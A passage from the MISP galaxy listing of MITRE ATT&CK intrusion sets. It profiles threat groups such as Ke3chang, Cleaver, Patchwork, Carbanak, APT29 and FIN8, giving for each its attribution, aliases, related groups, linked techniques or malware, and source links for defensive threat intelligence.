[Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted oil, government, diplomatic, and military organizations as well as NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)(Citation: Microsoft NICKEL December 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Ke3chang - G0004"

Ke3chang - G0004 is also known as:

  • Ke3chang

  • APT15

  • Mirage

  • Vixen Panda

  • GREF

  • Playful Dragon

  • RoyalAPT

  • NICKEL

Ke3chang - G0004 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 7062. Table References

Links

https://attack.mitre.org/groups/G0004

https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf

https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs

https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe

Cleaver - G0003

[Cleaver](https://attack.mitre.org/groups/G0003) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. (Citation: Cylance Cleaver) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). (Citation: Dell Threat Group 2889)

The tag is: misp-galaxy:mitre-intrusion-set="Cleaver - G0003"

Cleaver - G0003 is also known as:

  • Cleaver

  • Threat Group 2889

  • TG-2889

Cleaver - G0003 has relationships with:

  • similar: misp-galaxy:threat-actor="Cutting Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="TinyZBot - S0004" with estimative-language:likelihood-probability="almost-certain"

Table 7063. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/

https://attack.mitre.org/groups/G0003

https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

Patchwork - G0040

[Patchwork](https://attack.mitre.org/groups/G0040) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Patchwork - G0040"

Patchwork - G0040 is also known as:

  • Patchwork

  • Hangover Group

  • Dropping Elephant

  • Chinastrats

  • MONSOON

  • Operation Hangover

Patchwork - G0040 has relationships with:

  • similar: misp-galaxy:threat-actor="QUILTED TIGER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="摩诃草 - APT-C-09" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="MONSOON - G0042" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"

Table 7064. Table References

Links

http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf

http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries

https://attack.mitre.org/groups/G0040

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/

https://securelist.com/the-dropping-elephant-actor/75328/

https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/

https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/

Carbanak - G0008

[Carbanak](https://attack.mitre.org/groups/G0008) is a cybercriminal group that has used [Carbanak](https://attack.mitre.org/software/S0030) malware to target financial institutions since at least 2013. [Carbanak](https://attack.mitre.org/groups/G0008) may be linked to groups tracked separately as [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN7](https://attack.mitre.org/groups/G0046) that have also used [Carbanak](https://attack.mitre.org/software/S0030) malware.(Citation: Kaspersky Carbanak)(Citation: FireEye FIN7 April 2017)(Citation: Europol Cobalt Mar 2018)(Citation: Secureworks GOLD NIAGARA Threat Profile)(Citation: Secureworks GOLD KINGSWOOD Threat Profile)

The tag is: misp-galaxy:mitre-intrusion-set="Carbanak - G0008"

Carbanak - G0008 is also known as:

  • Carbanak

  • Anunak

Carbanak - G0008 has relationships with:

  • similar: misp-galaxy:threat-actor="FIN7" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="Carbanak - APT-C-11" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="FIN7 - G0046" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 7065. Table References

Links

https://attack.mitre.org/groups/G0008

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf

https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/

https://www.secureworks.com/research/threat-profiles/gold-kingswood?filter=item-financial-gain

https://www.secureworks.com/research/threat-profiles/gold-niagara

WIRTE - G0090

[WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. [WIRTE](https://attack.mitre.org/groups/G0090) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.(Citation: Lab52 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021)

The tag is: misp-galaxy:mitre-intrusion-set="WIRTE - G0090"

WIRTE - G0090 is also known as:

  • WIRTE

Table 7066. Table References

Links

https://attack.mitre.org/groups/G0090

https://lab52.io/blog/wirte-group-attacking-the-middle-east/

https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044

HEXANE - G1001

[HEXANE](https://attack.mitre.org/groups/G1001) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://attack.mitre.org/groups/G1001)'s TTPs appear similar to [APT33](https://attack.mitre.org/groups/G0064) and [OilRig](https://attack.mitre.org/groups/G0049) but due to differences in victims and tools it is tracked as a separate entity.(Citation: Dragos Hexane)(Citation: Kaspersky Lyceum October 2021)(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)

The tag is: misp-galaxy:mitre-intrusion-set="HEXANE - G1001"

HEXANE - G1001 is also known as:

  • HEXANE

  • Lyceum

  • Siamesekitten

  • Spirlin

Table 7067. Table References

Links

https://attack.mitre.org/groups/G1001

https://dragos.com/resource/hexane/

https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf

https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns

https://www.clearskysec.com/siamesekitten/

https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign

Frankenstein - G0101

[Frankenstein](https://attack.mitre.org/groups/G0101) is a campaign carried out between January and April 2019 by unknown threat actors. The campaign name comes from the actors' ability to piece together several unrelated components.(Citation: Talos Frankenstein June 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Frankenstein - G0101"

Frankenstein - G0101 is also known as:

  • Frankenstein

Table 7068. Table References

Links

https://attack.mitre.org/groups/G0101

https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html

PittyTiger - G0011

[PittyTiger](https://attack.mitre.org/groups/G0011) is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.(Citation: Bizeul 2014)(Citation: Villeneuve 2014)

The tag is: misp-galaxy:mitre-intrusion-set="PittyTiger - G0011"

PittyTiger - G0011 is also known as:

  • PittyTiger

PittyTiger - G0011 has relationships with:

  • similar: misp-galaxy:threat-actor="APT24" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"

Table 7069. Table References

Links

https://airbus-cyber-security.com/the-eye-of-the-tiger/

https://attack.mitre.org/groups/G0011

https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html

APT16 - G0023

[APT16](https://attack.mitre.org/groups/G0023) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. (Citation: FireEye EPS Awakens Part 2)

The tag is: misp-galaxy:mitre-intrusion-set="APT16 - G0023"

APT16 - G0023 is also known as:

  • APT16

APT16 - G0023 has relationships with:

  • uses: misp-galaxy:mitre-malware="ELMER - S0064" with estimative-language:likelihood-probability="almost-certain"

Table 7070. Table References

Links

https://attack.mitre.org/groups/G0023

https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

APT17 - G0025

[APT17](https://attack.mitre.org/groups/G0025) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. (Citation: FireEye APT17)

The tag is: misp-galaxy:mitre-intrusion-set="APT17 - G0025"

APT17 - G0025 is also known as:

  • APT17

  • Deputy Dog

APT17 - G0025 has relationships with:

  • similar: misp-galaxy:threat-actor="APT17" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Winnti Group - G0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Axiom - G0001" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="BLACKCOFFEE - S0069" with estimative-language:likelihood-probability="almost-certain"

Table 7071. Table References

Links

https://attack.mitre.org/groups/G0025

https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf

APT18 - G0026

[APT18](https://attack.mitre.org/groups/G0026) is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. (Citation: Dell Lateral Movement)

The tag is: misp-galaxy:mitre-intrusion-set="APT18 - G0026"

APT18 - G0026 is also known as:

  • APT18

  • TG-0416

  • Dynamite Panda

  • Threat Group-0416

APT18 - G0026 has relationships with:

  • similar: misp-galaxy:threat-actor="SAMURAI PANDA" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT4" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT18" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1107" with estimative-language:likelihood-probability="almost-certain"

Table 7072. Table References

Links

http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/

https://attack.mitre.org/groups/G0026

https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop

https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop

APT29 - G0016

[APT29](https://attack.mitre.org/groups/G0016) is a threat group that has been attributed to Russia’s Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)

In April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Unit 42 SolarStorm December 2020)

The tag is: misp-galaxy:mitre-intrusion-set="APT29 - G0016"

APT29 - G0016 is also known as:

  • APT29

  • IRON RITUAL

  • IRON HEMLOCK

  • NobleBaron

  • Dark Halo

  • StellarParticle

  • NOBELIUM

  • UNC2452

  • YTTRIUM

  • The Dukes

  • Cozy Bear

  • CozyDuke

  • SolarStorm

  • Blue Kitsune

  • UNC3524

APT29 - G0016 has relationships with:

  • similar: misp-galaxy:threat-actor="APT29" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088" with estimative-language:likelihood-probability="almost-certain"

Table 7073. Table References

Links

http://www.secureworks.com/research/threat-profiles/iron-hemlock

https://attack.mitre.org/groups/G0016

https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/

https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF

https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/

https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services

https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise

https://www.mandiant.com/resources/blog/unc3524-eye-spy-email

https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf

https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf

https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise

https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html

https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html

https://www.secureworks.com/research/threat-profiles/iron-ritual

https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf

https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/

BITTER - G1002

[BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)

The tag is: misp-galaxy:mitre-intrusion-set="BITTER - G1002"

BITTER - G1002 is also known as:

  • BITTER

  • T-APT-17

Table 7074. Table References

Links

https://attack.mitre.org/groups/G1002

https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html

https://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan

Darkhotel - G0012

[Darkhotel](https://attack.mitre.org/groups/G0012) is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group’s name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. [Darkhotel](https://attack.mitre.org/groups/G0012) has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.(Citation: Kaspersky Darkhotel)(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft Digital Defense FY20 Sept 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Darkhotel - G0012"

Darkhotel - G0012 is also known as:

  • Darkhotel

  • DUBNIUM

Darkhotel - G0012 has relationships with:

  • similar: misp-galaxy:360net-threat-actor="Darkhotel - APT-C-06" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 7075. Table References

Links

https://attack.mitre.org/groups/G0012

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWxPuf

https://securelist.com/darkhotels-attacks-in-2015/71713/

https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/

https://www.microsoft.com/security/blog/2016/06/20/reverse-engineering-dubniums-flash-targeting-exploit/

https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/

Evilnum - G0120

[Evilnum](https://attack.mitre.org/groups/G0120) is a financially motivated threat group that has been active since at least 2018.(Citation: ESET EvilNum July 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Evilnum - G0120"

Evilnum - G0120 is also known as:

  • Evilnum

Table 7076. Table References

Links

https://attack.mitre.org/groups/G0120

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

Molerats - G0021

[Molerats](https://attack.mitre.org/groups/G0021) is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group’s victims have primarily been in the Middle East, Europe, and the United States.(Citation: DustySky)(Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)(Citation: Cybereason Molerats Dec 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Molerats - G0021"

Molerats - G0021 is also known as:

  • Molerats

  • Operation Molerats

  • Gaza Cybergang

Molerats - G0021 has relationships with:

  • similar: misp-galaxy:threat-actor="Molerats" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7077. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf

https://attack.mitre.org/groups/G0021

https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/

https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html

admin@338 - G0018

[admin@338](https://attack.mitre.org/groups/G0018) is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as [PoisonIvy](https://attack.mitre.org/software/S0012), as well as some non-public backdoors. (Citation: FireEye admin@338)

The tag is: misp-galaxy:mitre-intrusion-set="admin@338 - G0018"

admin@338 - G0018 is also known as:

  • admin@338

admin@338 - G0018 has relationships with:

  • similar: misp-galaxy:threat-actor="TEMPER PANDA" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"

Table 7078. Table References

Links

https://attack.mitre.org/groups/G0018

https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

APT19 - G0073

[APT19](https://attack.mitre.org/groups/G0073) is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. (Citation: FireEye APT19) Some analysts track [APT19](https://attack.mitre.org/groups/G0073) and [Deep Panda](https://attack.mitre.org/groups/G0009) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China’s Espionage Jul 2016) (Citation: FireEye APT Groups) (Citation: Unit 42 C0d0so0 Jan 2016)

The tag is: misp-galaxy:mitre-intrusion-set="APT19 - G0073"

APT19 - G0073 is also known as:

  • APT19

  • Codoso

  • C0d0so0

  • Codoso Team

  • Sunshop Group

Table 7079. Table References

Links

https://attack.mitre.org/groups/G0073

https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/

https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/

https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059

https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html

https://www.fireeye.com/current-threats/apt-groups.html#apt19

Mofang - G0103

[Mofang](https://attack.mitre.org/groups/G0103) is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim’s infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries.(Citation: FOX-IT May 2016 Mofang)

The tag is: misp-galaxy:mitre-intrusion-set="Mofang - G0103"

Mofang - G0103 is also known as:

  • Mofang

Table 7080. Table References

Links

https://attack.mitre.org/groups/G0103

https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf

APT41 - G0096

[APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

The tag is: misp-galaxy:mitre-intrusion-set="APT41 - G0096"

APT41 - G0096 is also known as:

  • APT41

  • Wicked Panda

Table 7081. Table References

Links

https://attack.mitre.org/groups/G0096

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.group-ib.com/blog/colunmtk-apt41/

https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf

LazyScripter - G0140

[LazyScripter](https://attack.mitre.org/groups/G0140) is a threat group that has mainly targeted the airline industry since at least 2018, primarily using open-source toolsets.(Citation: MalwareBytes LazyScripter Feb 2021)

The tag is: misp-galaxy:mitre-intrusion-set="LazyScripter - G0140"

LazyScripter - G0140 is also known as:

  • LazyScripter

Table 7082. Table References

Links

https://attack.mitre.org/groups/G0140

https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf

Sharpshooter - G0104

Operation [Sharpshooter](https://attack.mitre.org/groups/G0104) is the name of a cyber espionage campaign discovered in October 2018 targeting nuclear, defense, energy, and financial companies. Though overlaps between this adversary and [Lazarus Group](https://attack.mitre.org/groups/G0032) have been noted, definitive links have not been established.(Citation: McAfee Sharpshooter December 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Sharpshooter - G0104"

Sharpshooter - G0104 is also known as:

  • Sharpshooter

Table 7083. Table References

Links

https://attack.mitre.org/groups/G0104

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf

Strider - G0041

[Strider](https://attack.mitre.org/groups/G0041) is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda.(Citation: Symantec Strider Blog)(Citation: Kaspersky ProjectSauron Blog)

The tag is: misp-galaxy:mitre-intrusion-set="Strider - G0041"

Strider - G0041 is also known as:

  • Strider

  • ProjectSauron

Strider - G0041 has relationships with:

  • similar: misp-galaxy:360net-threat-actor="索伦之眼 - APT-C-16" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="ProjectSauron" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Remsec - S0125" with estimative-language:likelihood-probability="almost-certain"

Table 7084. Table References

Links

http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets

https://attack.mitre.org/groups/G0041

https://securelist.com/faq-the-projectsauron-apt/75533/

https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf

DarkVishnya - G0105

[DarkVishnya](https://attack.mitre.org/groups/G0105) is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.(Citation: Securelist DarkVishnya Dec 2018)

The tag is: misp-galaxy:mitre-intrusion-set="DarkVishnya - G0105"

DarkVishnya - G0105 is also known as:

  • DarkVishnya

Table 7085. Table References

Links

https://attack.mitre.org/groups/G0105

https://securelist.com/darkvishnya/89169/

POLONIUM - G1005

[POLONIUM](https://attack.mitre.org/groups/G1005) is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess [POLONIUM](https://attack.mitre.org/groups/G1005) has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.(Citation: Microsoft POLONIUM June 2022)

The tag is: misp-galaxy:mitre-intrusion-set="POLONIUM - G1005"

POLONIUM - G1005 is also known as:

  • POLONIUM

Table 7086. Table References

Links

https://attack.mitre.org/groups/G1005

https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/

Taidoor - G0015

[Taidoor](https://attack.mitre.org/groups/G0015) has been deprecated, as the only technique it was linked to was deprecated in ATT&CK v7.

The tag is: misp-galaxy:mitre-intrusion-set="Taidoor - G0015"

Taidoor - G0015 is also known as:

  • Taidoor

Taidoor - G0015 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 7087. Table References

Links

https://attack.mitre.org/groups/G0015

FIN8 - G0061

[FIN8](https://attack.mitre.org/groups/G0061) is a financially motivated threat group that has been active since at least January 2016, and known for targeting organizations in the hospitality, retail, entertainment, insurance, technology, chemical, and financial sectors. In June 2021, security researchers detected [FIN8](https://attack.mitre.org/groups/G0061) switching from targeting point-of-sale (POS) devices to distributing a number of ransomware variants.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Fin8 May 2016)(Citation: Bitdefender Sardonic Aug 2021)(Citation: Symantec FIN8 Jul 2023)

The tag is: misp-galaxy:mitre-intrusion-set="FIN8 - G0061"

FIN8 - G0061 is also known as:

  • FIN8

  • Syssphinx

FIN8 - G0061 has relationships with:

  • similar: misp-galaxy:threat-actor="FIN8" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077" with estimative-language:likelihood-probability="almost-certain"

Table 7088. Table References

Links

https://attack.mitre.org/groups/G0061

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor

https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html

https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf

https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html

Rocke - G0106

